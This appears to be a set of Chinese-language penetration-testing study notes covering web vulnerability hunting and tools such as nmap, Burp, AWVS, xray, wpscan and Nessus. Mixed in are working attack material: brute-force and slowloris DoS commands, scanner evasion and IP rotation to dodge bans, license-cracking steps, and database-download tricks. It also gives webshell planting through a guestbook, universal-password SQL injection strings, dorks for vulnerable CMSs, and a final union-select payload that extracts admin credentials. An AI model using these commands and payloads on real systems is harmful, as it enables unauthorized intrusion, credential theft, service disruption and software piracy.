07.漏洞分析

1.web漏洞恩熙
2.漏洞分析工具
3.kali漏洞分析工具
4.弱漏洞利用
5.漏洞批量探测

1.web漏洞分析
我们要挖掘什么漏洞？
应该从哪里挖掘？
网站源码分析
已知源码
我们可以下载其源码本地分析
百度该源码漏洞
未知源码
黑盒测试该网站漏洞（手工、工具自动扫描）

我们要挖掘什么漏洞？
答：可以按照owasp top 10挖掘重点漏洞

应该从哪里挖掘？
答：sql url 无论怎么挖都和用户数据交互离不开
www.fanghan.com/news.asp?id=12&sid=123 //和数据有交互
www.fanghan.com/index.html //静态页面无交互，不易产生漏洞

有经验的工程师一般会
www.fanghan.com
1.通过信息收集
2.测试注入漏洞 / -0 and 1=1 1=2
3.识别cms //查看对应cms漏洞
fanghan.com/html/12?html //这是特有的伪静态
①分析出是aspcms 可以通过百度搜索对应的cms漏洞进行 探测
②下载该cms去分析源码（找到后台笛子，数据库路径，编辑器，上传，数据库备份路径等等）
data/#data.asp // 前台留言，直接写入一句话，菜刀链接
data/data.mdb //直接下载就行
③各类cms的exp
如果不能识别cms类型，通过信息收集，挖掘web应用程序漏洞（sql 上传，xss ,csrf,SSRF,逻辑，代码执行，文件包含等等）

2.漏洞分析工具使用
漏洞扫描工具：
namp awvs appscan burp xray w3af skipfish nikto nessus

NMAP---端口扫描之王 //信息收集会用到他
主机探测
端口扫描
服务版本扫描
主机系统指纹识别
密码破解
漏洞探测
创建扫描脚本

主机探测（一） //扫描你主机中哪些正常通信的，并不是关机的。
扫描单个主机 nmap 192.168.1.2
扫描整个子网,命令如下: //测这个网段有哪些主机存活，探测同时也会扫描100个经常开放的相关端口
nmap 192.168.1.1/24
扫描多个目标,命令如下：
nmap 192.168.1.2 192.168.1.5
扫描一个范围内的目标,如下： nmap 192.168.1.1-100 (扫描IP地址为192.168.1.1-192.168.1.100内的所有主机) 如果你有一个ip地址列表，将这个保存为一个txt文件，和namp在同一目录下,扫描这个txt内的所有主机，命令如下： nmap -iL target.txt

①nmap 192.168.1.1/24 100个最有可能开放的端口 //粗略的去看一下有哪些主机存活
②nmap -sT -p1-65535 192.168.8.128 //详细的去扫描单个目标所有端口
③nmap iL target.txt -exclude-file exc.txt // 扫描文件比较多就可以放到txt里面，放到nmap目录下去扫描 扫描target.txt 并排除掉exc.txt里的主机

如果你想看到你扫描的所有主机的列表，用以下命令:
nmap -sL 192.168.1.1/24
扫描除过某一个ip外的所有子网主机,命令：
nmap 192.168.1.1/24 -exclude 192.168.1.1
扫描除过某一个文件中的ip外的子网主机命令
nmap 192.168.1.1/24 -excludefile xxx.txt(xxx.txt中的文件将会从扫描的主机中排除)

端口扫描：

常用命令：
nmap -F -sT -v nmap.org
-F：扫描100个最有可能开放的端口
-v 获取扫描的信息
-sT：采用的是TCP扫描 不写也是可以的，默认采用的就是TCP扫描 -p 指定要扫描的端口
-p 80,90,3306,10-100

扫描端口状态：
Open 端口开启，数据有达到主机，有程序在端口上监控
closed 端口关闭， 数据有达到主机，没有程序在端口上监控
Filtered 数据没有到达主机，返回的结果为空，数据被防火墙或者是IDS过滤
UnFiltered 数据没有到达主机，但是不能识别端口的当前状态
Open | Filtered 端口没有返回值，主要发生在UDP、ip, FIN,NULL和Xmas扫描中
Closed | filtered 只发生在ip ID idle扫描

TCP扫描（-sT）
这是一种最为普通的扫描方法，这种扫描方法的特点是：
扫描的速度快，准确性高，对操作者没有权限上的要求，
但是容易被防火墙和IDS(防入侵系统)发现
运行的原理：通过建立TCP的三次握手连接来进行信息的传递
① Client端发送SYN；
② Server端返回SYN/ACK，表明端口开放；
③ Client端返回ACK，表明连接已建立；
④ Client端主动断开连接。

SYN扫描（-sS）
这是一种秘密的扫描方式之一，因为在SYN扫描中Client端和Server端没有形成3次握手，所以没有建立一个正常的TCP连接，因此不被防火墙和日志所记录，一般不会再目标主机上留下任何的痕迹，但是这种扫描是需要root权限（对于windows用户来说，是没有root权限这个概念的，root权限是linux的最高权限，对应windows的管理员权限）

UDP端口扫描
使用UDP ping探测主机：
nmap -PU 192.168.1.0/24
服务版本探测
nmap -sV 192.168.1.1
精准地确认端口上运行的服务
nmap -sV --script unusual-port 192.168.1.1

扫描出来不知道的端口服务怎么办？
1.百度
2.可以通过http访问 //fanghan.com:8811
3.nc telnet nmap 对端口进行指纹识别

nmap -sV -p8120-8130 192.168.1.1 //服务指纹识别
namp -sV -p8120-8130 --script unusual-port 192.168.1.1 //服务指纹识别不行就用这个

探测目标主机的操作系统

nmap -O 192.168.1.19
nmap -A 192.168.1.19
-oN 导出扫描结果 //txt格式方便报告
-oX 导出扫描结果xml格式

nmap信息收集脚本 国外的接口
脚本 解释
hostmap-ip2hosts IP反查
dns-bruts DNS信息收集
membase-http-info 检索系统信息
smb-security-mode.nse 后台打印机服务漏洞
smb-check-vulns.nse 系统漏洞扫描
http-stored-xss.nse 扫描 web漏洞
snmp-win32-servlces 通过snmp列举windows服务/账户
dns-brute 枚举DNS服务器的主机名
http-headers/http-sitemap-generator HTTP信息收集
SSL-enum-ciphers 枚举SSL秘钥
ssh-hostey SSH服务秘钥 信息探测

使用方法：
nmap -sn --script hostmap-ip2hosts www.fanghan.com //对目标进行IP反查
nmap --script dns-brute www.fanghan.com
nmap --script dns-brute dns-brute.threads=10 www.fanghan.com //对目标DNS信息的收集
nmao -p445 192.168.23.1 --script membase-http-info //了解目标系统的详细信息

密码破解
暴力破解VNC
nmap --script vnc-brute --script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128
破解telnet
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 192.168.1.1
ftp弱口令暴力破解
nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 192.168.1.1

漏洞探测
扫描系统漏洞
namp --script vuln 192.168.1.1 // 其实就是扫描cve的漏洞
//扫描下有没有漏洞，有的话直接使用msf对系统进行漏洞利用
HTTP.sys 远程代码执行
nmap -sV --script http-vuln-cve2015-1635 192.168.1.1
IIS 短文件泄露
nmap -p 8080 --script http-iis-short-name-brute 192.168.1.1
拒绝服务
nmap --max-parallelism 800--script http-slowloris www.cracer.com
验证http 中开启了put 方法 //如果开启可以直接写入一句话进去。
nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
验证MySQL 匿名访问 //能不能用空密码进行访问mysql
nmap --script mysql-empty-password 203.195.139.153

防火墙躲避
-f 分片绕过
-D使用诱饵隐蔽扫描
NMAP -D 1.1.1.1,222.222.222.222 www.cracer.com --source-port 源端口欺骗
//防火墙识别你是通过原地址和原端口，这个是指定地址进行欺骗

技术文章：
https://blog.csdn.net/ZiXuanFY/article/details/52513512

AWVS
安装完后也只能谷歌使用

安装重点：
1.可以在内网直接访问3443端口
2.安装证书
3.破解
复制wvsc.exe到C:Program Files (x86)Acunetix13.0.200205121 替换掉
复制license_info.json到C:ProgramDataAcunetixsharedlicense 替换掉

//AWVS配合xray可以批量扫描

网站爬行
漏洞扫描
目标发现
子域名扫描
http 编辑
http嗅探
http模糊测试
认证测试
网络服务扫描器

Dashboard：
Dashboard是一个仪表盘，里面包含所有网站高危中危普通漏洞总和。
Most Vulnerable Tarfets 这些是扫的ip以及端口
TOP Vulnerabilities 漏洞的分类

菜单类的介绍：
Targets（目标）：
Add Target(添加目标)
Add Targers(一群目标)
Target Groips（分组）//每天扫20个就可以建个文件夹方便管理
实例：
①创建一个组名称为2020-7-14 添加目标http://192.168.194.138:8001 分配到2020-7-14 保存
②保存以后 Buslness Crlikaliyt是否是作用为商业用途。//默认就可以
③ Crawling爬虫信息 User Agent 是否使用默认，使用谷歌或者火狐 // 不要使用默认，会被安全狗拦截
④路径默认就行
⑤import Files 导入文件结构 //也可以不导入
⑥HTTP:Authentication 开启后这个认真是爬取到用户名密码自动认真 //不填也可以
⑦Client Certificata 开启后，填入相关证书 //不填也可以
⑧Proxy Server 开启代理选择 HTTP 127.0.0.1 1080 //扫描后会先把请求交给ss代理，在由ss代理出去，这样更加隐蔽。如果屏蔽代理就扫不到
⑨Scan 扫描yes 会有选择
Scan Type(扫描类型）：
Full Scan//完整的扫描
High Risk vulnerabilities//高风险的漏洞扫描
Cross-site Scriping Vulnerabilities//跨站漏洞扫描
SQL lnjection Vulnerabilities //sql注入扫描
Weak passwords //只扫描弱口令
赶时间就扫注入，因为扫注入牛逼
Report(模板)
//模板默认可以不用生成，扫描完后再去生成

扫描后：
Scan lnformation,扫描信息 漏洞级别
Target lnformation 会列出类型
扫描信息，服务器版本，系统，脚本
Discovered Hosts 网站的外链
Latest Alerts 红:高危 黄：中危 蓝：低危 绿：信息泄露
Vulnerabilities 漏洞的详情
Site Structure 蜘蛛爬行的站点信息
Events 事件信息

Reports 报告生成
New Report创建报告
Scan Report目标报告
Target Report 扫描报告
All Vulneraxxxx 漏洞报告 标准： ISO2701 OWASP Top10 2017 企业较多用

Email Settings 扫描发送给邮箱
Excluded Hours 定义客户扫描事件

系统里面自动切换ip
kali有一个--auto-ip-changer 每5秒切换一次ip
主要是对抗阿里云封Ip

APPSan
1.安装appscan9.0软件：运行“APPS_STD_EDI_9.0_WIN_ML_EVA.exe”。
2.安装appscan9.0临时补丁：运行“9.0.0.0iFix001-AppScan.msp”。
3.安装appscan9.0.0.1补丁包，运行“9.0.0.1-AppScan_Setup.msp”。
4.破解，将“LicenseProvider.dll”替换到“AppScan Standard”目录下。

复制APPSan文件包---按照readme.txt的顺序---
安装dotNet461_WithFix_CHS_2016.06.08.exe 程序
默认安装就可以了
在安装2
在安装3
操作4


//不知道如何给客户讲的话可以参考APPSan里的修复方案

进入页面后
创建新的模板 // 可以试试其他模板
常规扫描---
web应用程序扫描---
起始url：目标ip
添加其他域名 // 也可以添加子域名
配置代理 //也可以不配置
不记录---
缺省值---
完成---yes---
保存扫描结果

开始后自动先爬去目录和链接
左上角手动点击开始扫描

Burp2020

Dashboard仪表盘:
Tasks任务模块
1.Add links Add item itself ,same爬虫
2.Audit checks - passive 扫描漏洞的
Event log事件模块
lssue activity漏洞模块
New sacn 主动扫描//审计目标，并给目标发送漏洞验证
details 边爬边扫
只爬行不扫描漏洞
填写扫描地址
con figuration 扫描配置---Clawling：
爬虫线程
爬行时间
登录信息
扫描配合---Auditing:
扫漏配置，默认就行
Application login 爬虫账号密码
Resource pool 线程时间，提交间隔时间//默认即可

New live task 被动扫描//单纯审计流量查看可以目录

被动扫描无法添加目标
Proxy Repeater intruder 发送到这几个里面他会自己进行探测
爬取到的目录在Target里面

Proxy代理抓包
右键Do intercept response tothisxxxx//返回当前响应包
放包
响应包可以把fels 改成true
//一般会在验证的地方改true例如登录界面修改
HTTPhistory //代理历史记录

Options代理设置小知识
All interfaces//如果设置这里所有的网卡访问8080都会被抓包

抓HTTPS小技巧
火狐挂载代理输入127.0.0.1
搜索burp
CA Certificate 点击下载
工具---选项---高级---加密---查看证书--
服务器---导入---下载的der后缀
找到 PortswiaaerCA点击编辑信任---信任此证书---编辑信任都勾选---确定
导出PortswiaaerCA----当前环境下后缀是CRT ----
导出之后---证书机构---把导出的CAT导入进入确定---确定

测试https://baidu.com。 就能抓到443https的接口了

谷歌抓https
现在代理里面把https 127.0.0.1 8080添加上、
设置---高级---更多---管理证书---
受信任的根证书颁发机构---下一步---浏览选择刚刚的crt证书---完成

手机抓取HTTPS
找到百度手机型号，把crt证书导入到里面去就行

Options代理设置
代理挂载点/导入证书/导出证书
截取客户端请求//默认
响应包请求//默认
Mtch and replace替换头部信息cookie

Intruder
Positions
爆破用的多
Sniper //就加载一个字典
Battering ram // 两个多个变量使用一个字典。适合爆破账号和密码一致的情况，例如企业员工登录接口
Pitchfork// 每个标量使用单独一个字典，变量1字典1，变量2字典2. 顺序从上到下，从左到右位置来确定。
Cluster bomb//交叉爆破，取用户名1跑100密码，用户名2跑100密码，用户名3跑100密码

实例：
爆破企业员工登录的后台可以，指定密码，采用Sniper调用字典pas(中国姓名前500)来爆破。

ip池跑方法，用Battering ram client-ip来更换IP变量。

Payloads
payload type字典类型较多使用的有
Simple list单一文本
character substitution// 字符变化数字
Numbers //跑数字。 格式：1 1000 1 跑1到1000的数字，每次递增1
1 4 最小的整数位 最大的整数位。 最小的小数位 最大的小数位
Brute forcer//暴力破解验证码，4位大概10分钟自动生成字典拍
Extension-generated//根据扩展插件随机生成，例如随机ip插件

Payload Processing里面Add添加：
Add prefix //在头部添加信息
Add suffix //在尾部添加信息
Match/replace//匹配替换 //匹配到admin替换为fanghan
Hash和Encode//转编码，大多页面都会把密码转为编码提交到服务器。这时候用到这个就行
Intruder文章
http://bubuko.com/infodetail-3506522.html

Payload Encoding URL编码
一般都去掉，比如跑目录的时候会不正确

Options
Upedate control//默认更新头请求信息，Waf会检测

Request Engine线程类
Nemberxxx:5 //5个线程一般给15就行，多了小站会跑死
3 //出现错误重连次数 3次
2000//每次重连间隔时间2000毫秒
Attack Results //扫描保存的信息
Grep-Match // 匹配规则

Grep-Rxtract//正则匹配规则
从结果里去匹配相应的信息

Repeater 重放器

Sequencer taoke识别功能

Decoder 编码解码功能

Comparer 请求对比 // 在proxy右键发送

扩展重点
除了商店自带的扩展以外，自己添加扩展方法 例如:fake ip 帮助生成Ip
1.Options
2.Python xxxx安装jython.jar环境
3.Extensions选项Add--Extension type 选择python
4.Extension type（最好不是中文路径） fake ip
5.找到repealer 选择框右键fakeip
6.fakeip:指定ip 127.0.0.1 随机生成ip
7.client-ip 1.1.1.1 //拦截位置添加变量
8.Payloads里面使用扩展类型
9.跑

还有有个扫phpStudy-Backdoor-passive.py 后门的插件需要自动添加
burp设置代理服务器
User options
Upstream Proxy Serers
Add
*
127.0.0.1
1080
这就是由burp把代理给ssr

切换代理ip文章
https://www.uedbox.com/post/59218/
//得注册一个亚马逊的key

插件可以查看工具里带的文章

Kali 漏洞分析工具使用
skipfish
shipfish是一款web应用安全侦查工具。skipfish会利用递归怕重和基于字典的探针生成一副交互式网站地图。最终生成的地图绘制通过安全检查后输出。
使用：
skipfish -o (输出位置) -W/-S （字典文件位置） （目标网站）
扫描结束后查看输出文件即可。。

1. ls /usr/share/skipfish/dictionaries/complete.wl //复制下来字典路径，先查看字典位置
2. skipfish -o 123 -S 路径 回车//在root 123目录下
3.skipfish -o 123 -S 路径 http://192.168.194.138 扫描
4.任意键继续
5.Database statistics：Issues found: 23 info （信息泄露）， 0 warn （警告），0low （低危）， 0 medium（中危）， 2high(高危 impact

7.扫描完成后去123里找index 查看结果，并且打开错误页面用手注入验证
8.用sqlmap -u "注入地址" 进行验证

w3af

w3af是web application attack and audit framework（web应用攻击和安全审计框架）的缩写。
它是一个开源的web应用安全扫描器和漏洞利用工具。
两种使用方式：
一种图形界面
二种是命令行

图形界面进入方法
cd w3af/ 进入w3af目录
ls // 查看执行程序
./w3af_gui //执行图形程序
相当于awvs 和APPscan主要扫web漏洞
功能：web扫漏，Manual Request(手动修改请求头）， Fuzzy request(压力测试)，Encode/decode（编码），导出请求，对比，设置代理。
我们使用主要功能扫漏洞即可
empty_profile空模板自定义
audit //扫描漏洞，里面可以自行选择需要扫哪些漏洞
//盲注，溢出，跨站，CSRF，代码执行，文件上传，文件泄露，本地文件包含，远程包含等等。
auth //认证插件，指定用户名密码
bruleforce// 爆破的
crawl //爬虫

如果不知道选择哪个就选择自带的模板比如
OWASP_TOP10
XXX
XXX
XXX

每次扫描他会指定操作系统和脚本类型，保存关闭扫描
log里查看结果
Results
exp查看漏洞情况

这个扫描器是重量级扫描器，特别针对代码执行漏洞

命令行使用方法
cd w3af/
./w3af_console
1.help //查看需要设置的东西
2.进入plugins//进入插件目录
3.help //查看9个插件分类

漏洞插件
4.audit//查看漏洞插件
如果只想调用sqli和xss怎么办
5.audit sqli xss // audit all 是启用所有插件
6.audit//查看调用情况 Enabled证明调用成功

爬虫插件
help
7.crawl//查看爬虫插件
8.crawl web_spider phpinfo//调用这两个插件

输出结果插件
9.help
10.output //默认是在console 控制台输出的也可以保存自定义文件
11.back

设置目标
12.target//进入设置目标
13.help //查看设置
14.view //查看设置的目标
15.set target http://192.168.194.138:80 //设置目标为192.168.197.138:80
16.set target_os windows //设置目标操作系统为windows系统
17.set target_framework php
18.back
19.help

设置访问出发点
20.http-settings
21.help
22.view //查看设置目标 默认的user_agent 是w3af.org如果有WAF会拦截
23.set user_agent 替换掉百度爬虫的连接
24.save//退出
25.back//返回菜单根目录

最后总结s
26.help
基本设置的是plugins插件，target目标，http-settings躲避参数
27.start//开始

ninkto
Nikto 是一款开放源代码的、功能强大的WEB扫描评估软件，能对web服务器多种安全项目进行测试的扫描软件，去寻找已知有名的漏洞，能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题，它可以扫描指定主机的WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主机允许的 http模式等等。它也使用LibWhiske库，但通常比Whisker更新的更为频繁。Nikto是网管安全人员必备的WEB审计工具之一。
-h 指定扫描的目标 –p 端口
nikto -h www.xiaojin.org -p 80,8080,8081
-C 指定CGI目录 –all表示猜解CGI目录
nikto -h www.xiaojin.org -C all
-T选项包含很多小选项 –T 9表示扫描SQL注入漏洞
nikto -h www.xiaojin.org -T 9
-o 指定输入结果
nikto -h www.xiaojin.org -o result.txt

nikto -H //查看详细帮助

WFUZZ

是一款用来进行web应用暴力猜解的工具，支持对网站目录、登录信息、应用资源文件等暴力猜解，还可以进行get及post参数的猜解，sql注入、xss漏洞的测试等，该工具所有功能都依赖于字典文件。
用法： 猜解www.cracer.com/目录下有哪些页面和目录，通过加载字典文件进行猜解，并且排除404页面，将结果以整齐的格式存放到0k.html
wfuzz -c -z file,字典文件(pass) --hc 404 -o html www.cracer.com/FUZZ 2>0k.html 猜解登录表单的密码
wfuzz -c -z file,字典 -d "login=admin&pwd=FUZZ" --hc 404 http://www.cracer.com/admin/index.php
猜解id号
wfuzz -c -z range,1-1000 --hc 404 -o html http://www.cracer.com/?post=FUZZ 2>ok.html

wfuzz字典位置：
ls /usr/share/wfuzz/worflist/general/medium.txt //复制路径

wfu -c -z file,字典位置 --hc 404 http://192.168.194.138/FUZZ

Wpsan

Wpscan在kaliLinux2.0 中默认已经安装，WPScan是一款针对wwordpress的安全扫描软件；WPScan可以扫描出wordpress的版本，主题，插件，后台用户以及爆破后台用户密码等。

wpscan --url 地址 -e u
-e 爆破的意思
-e u //爆破用户名
-e p //爆破插件
-e t// 爆破主题

p分类：
ap 所有插件
vp 漏洞插件
t分类：
at 所有主题
vt 漏洞主题

-U admin -P /root/pass.txt //指定用户名admin 爆破密码路径

XRAY
使用方法参照文本：https://www.anquanke.com/post/id/184204
https://docs.xray.cool/#/tutorial/introduce

启用XRAY
./xray_linux_amd64

1.使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描 //自带的爬虫工具
xray webscan --basic-crawler http://example.com --html-output vuln.html

websan --basic-crawler http://192.168.194.138:80 --html-output 123.html

2.使用 HTTP 代理进行被动扫描//类似于burp侦听端口
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html
设置浏览器 http 代理为 http://127.0.0.1:7777，就可以自动分析代理流量并扫描。

3.只扫描单个 url，不使用爬虫
xray webscan --url http://example.com/?a=b --html-output single-url.html

4.手动指定本次运行的插件
默认情况下，将会启用所有内置插件，可以使用下列命令指定本次扫描启用的插件。

xray webscan --plugins cmd_injection,sqldet --url http://example.com
xray webscan --plugins cmd_injection,sqldet --listen 127.0.0.1:7777

5.指定插件输出
可以指定将本次扫描的漏洞信息输出到某个文件中: //不指定插件会默认使用所有插件去扫描
xray webscan --url http://example.com/?a=b
--text-output result.txt --json-output result.json --html-output report.html

用的比较多的不是单纯的调用，而是批量去扫描。

调用360的天相爬虫，爬到的保存起来交给xray，再去抓取扫描
调用原理：
先在xary侦听到目标站7777端口，在写一个python脚本去启动360天相的爬虫爬去指定的链接并且生成txt，
在把txt里的链接交给侦听的7777去扫描。

首先：需要在kali里面安装谷歌浏览器，然后还需要一个python写的脚本工具里叫launcher.py
在需要360天相爬虫。

webscan --listen 127.0.0.1:7777 --html-output p.html //先侦听端口
vi targets.txt //把需要爬的地址放到targets.txt里，可以写多个，例如测试c段或者目标比较多。
http://192.168.1.1:8080
python launcher.py //启用后就会给craw发送指令去抓取targets.txt里的网址，并且保存到sub_domains.txt里面，并且在把sub_domains.txt交给xray去扫描

Nessus

//我记得得需要企业邮箱
// Kali 下载就下载Debian 64的下载
下载nessus软件包
官方地址： http://www.tenable.com/products/nessus/select-your-operating-system
安装
dpkg -i Nessus-6.5.4-debian.deb
默认安装目录为/tmp/nussus
启动nessus
/etc/init.d/nessusd start //停止是stop

通过注册获取激活码 注册地址：
http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

1.netstat -tnlp //启动后查看侦听的端口 侦听的端口为8834

2.打开浏览器https://127.0.0.1:8834

3.第一次登录需要把激活码填写进去

4.第一次会更新内容需要一个半小时，如果奔溃了，就使用离线更新，工具包里有帖子

//all-2.0.tar.gz Nessus-8.10.0-dede //离线更新的包
5.admin admin

使用方法：
New Scan 主页可以创建新的扫描
lmport //导入扫描结果
Now Fdder //创建新的文件夹
//新建扫描模板如下：
Host Discovery //发现网络当中存活的主机
Basic Network Scan // 扫描网络信息
Advanced San //高级扫描 //自定义插件
Mobile Devxxx //发现网络中移动设备扫描
web APPloxxx //基于web应用程序的扫描
Credentinaxxx //认证的绕过等
Bash Shellshock //shell的执行等

例如扫描web //实际上就是他勾选了几个web漏洞插件
例如自定义扫描就是用高级扫描

进入高级扫描后进入配置界面

Name （创建扫描的名称）
Description(描述随便写)
Folder (文件夹选择默认即可)
Targets 目标
这个目标可以是域名，可以是ip，也可以是一个ip段 ,C类网址也可以//
//192.168.8.1-192.168.8.100 或者192.168.8.0/24

Add File //可以添加一个扫描文件，把地址域名放进文件加载扫描

Credentials 这个认证可以执行账号密码进行更深层次去扫描

Plugins //插件 右上角Enable All 启用 Dissble All

例如插件勾选：
Backdoors //检查是否有后面
Brude force attacks //暴力破解账号
CGl xxx //可以勾选下
Databass //数据库
Denial fo Service //拒绝服务
DNS
F5 //网络负载均衡
Firewalls //防火墙
FTP
Gen loo Local Secuity //基本信息
Servive doxxx //服务指定
settings //
SMTP problems //有没有邮件
SNMP //网络协议
下面几个Windows插件
设置完以后点击Save保存
返回出去点击开始标致

信息放大

当我们测试目标没法漏洞时，我们会将目标放大，发现更多与目标相关联的信息。
例如：
旁站-->C段?子域名
旁站： C段：获取到收集方向：ip、端口、域名、目录。
同网段其他服务器后要记得验证是否在同一机房内。
子域名：柿子挑软的捏（找低版本的更容易下手）
工具：Layer子域名挖掘 site:cracer.com

搞不了主站就去搞旁站，先了解旁站用几种方式搭建的
ip,端口，域名，目录，这4种搭建
ip不好发现
端口：nmap -sV 1.1.1.1扫描这个目标 识别高危端口//学校教育政府OA喜欢端口建站
域名：爱站，工具站点
目录：御剑扫描目录，bbs old shop upload m //扫出来后都得去访问下是不是另一个站点。
获取旁站的权限，再去提权，迂回拿到主站权限。

相关弱漏洞利用

暴库利用
下载漏洞
后台爆破
Exp使用
批量漏洞检测

暴库利用：
爆出了网站数据库文件位置
to parent directory
last modified Description
转到父目录
inurl:/.asp<id=<% <%< %
绕过防下载
#sdsf.mdb
下载时改成 %23sdsf.mdb
如果数据库文件本身就是asp、asa、cer文件，也可以直接写shell。
Aspcms

遇见这种：！@#￥fafsdafasfsaf.mdb如何下载
答：把她转换成url编码再去下载 在HackBar ENCODING转换

遇见：123123.asp //数据库文件变成asp怎么办
答：使用迅雷下载，下载后改成123213.mdb就行

asp2.0一般会有data目录
特定的cms 会有data目录/data.asp
data/db.asp
在前台留言插入一句话，使用菜刀连接，因为数据库是asp就直接连接了

下载漏洞 ///asp不多了，php比较多

phpcmsv9,meiunfo 6.0
大概位置：admin/234sdfsafs/php?fileconfig=../../congig.php//数据库路径和账号密码会泄露
如果根目录下有phpmyadmin就直接用密码等，如果没有，找旁站100个里总有一个有

下载文件名称为参数传递并且可控可操作。 http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/2012061222041778.doc http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc http://www.sxzzy.cn/ggjs/news/down.asp?FileName=doc/2012-5/2012053010329973.doc
下载漏洞利用

通过蜘蛛爬行
找到该url
下载 conn.asp config.php config.
asp db.mdb

后台密码爆破
网站常见的cms管理系统有：
织梦、discuz、帝国、phpweb、WordPress、aspcms、科讯、南方、良精、ecshop等
常见初始密码弱口令：
Admin、admin888、admin123、123456、111/123/111111、等等。
逻辑万能密钥：
‘or’=’or’
Admin’ or 1=1--
常见破解工具
Burpsuite
Discuz破解qi 
一些python密码破解脚本
httpfuzzer
针对性破解工具。。

当遇见：fanghan.com/897898/login.php //很有可能897898就是密码
fanghanadmin
fanghan.com
fanghan123
admin_fanghan

万能秘钥
asp 'or'='or'
php admin'or 1=1

后台爆破这一块：
无验证码，用burp
有也可以用burp

关键字 :
Powered by AspCms2.0
admin_shopxp/upLoad_bm.asp
inurl:news/html/?411.html
注入地址：
down/class/index.php?myord=1
news/class/index.php?showtag=
万能密码 admin 'or '1'='1
织梦批量 搜索关键字：
Powered by DedeCMS_V57_UTF8_SP1 2004-2011 DesDev Inc
inurl:shopxp_news.asp
TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin